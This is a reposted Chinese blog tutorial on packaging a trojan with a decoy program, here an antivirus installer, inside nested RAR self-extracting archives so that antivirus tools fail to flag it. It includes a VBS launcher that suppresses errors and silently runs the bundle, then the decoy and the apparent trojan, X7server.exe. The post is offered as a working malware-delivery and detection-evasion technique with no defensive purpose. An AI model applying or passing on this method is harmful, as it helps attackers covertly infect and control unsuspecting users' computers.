码迷,mamicode.com
首页 > 其他好文 > 详细

RAR自解压格式结合vbs脚本免杀捆绑

时间:2016-07-20 19:33:16      阅读:541      评论:0      收藏:0      [点我收藏+]

标签:

首先我们必须要认识原理问题。捆绑,几乎都是先将文件释放后在逐个运行,所以被捆绑文件自身必须免杀。
 
否则,就算捆绑在一起免杀了,运行的时候,一释放,立刻就会被杀掉。
 
自解压的制作方法我就不说了,洪雨提一下需要注意的一个点。
 
在框选文件的时候一定要先选择木马,再选择掩护文件,否则报毒几率会高。掩护文件,最好就是杀毒软件自身。
 
假如我们制作的自解压捆绑文件为1.exe。
 
如果我们直接设置成解压后运行捆绑的文件,很大程度会被杀。
 
所以我们需要用到一个vbs来运行木马和伪装程序。将1.exe和vbs文件进行二次自解压捆绑
 
这次制作过程中设置解压后运行vbs文件。
 
vbs文件用的是下面的代码。
 
On Error Resume Next
 
Set objWsh = CreateObject("Wscript.shell")
 
objWsh.Run "c:\1.exe    C:\" ,0,true 
 
WScript.Sleep 3000 
 
objWsh.Run "c:\360sd_se_3.1.0.3073L.exe C:\" ,0,true
 
objWsh.Run "c:\X7server.exe C:\" ,0,true
 
代码的意思很简单,解压后会释放1.exe的捆绑文件,和vbs文件。
 
vbs运行后,运行1.exe文件。1.exe文件运行后会自动释放木马和伪装文件。
 
vbs会延迟3秒钟后再运行伪装文件,然后运行木马。
 
运用vbs来执行运行的命令,经过二次捆绑实现了捆绑运行免杀的效果。
 
原文转自:http://www.zhizhuowz.com/post-539.html

RAR自解压格式结合vbs脚本免杀捆绑

标签:

原文地址:http://www.cnblogs.com/hongyuyingxiao/p/5689428.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!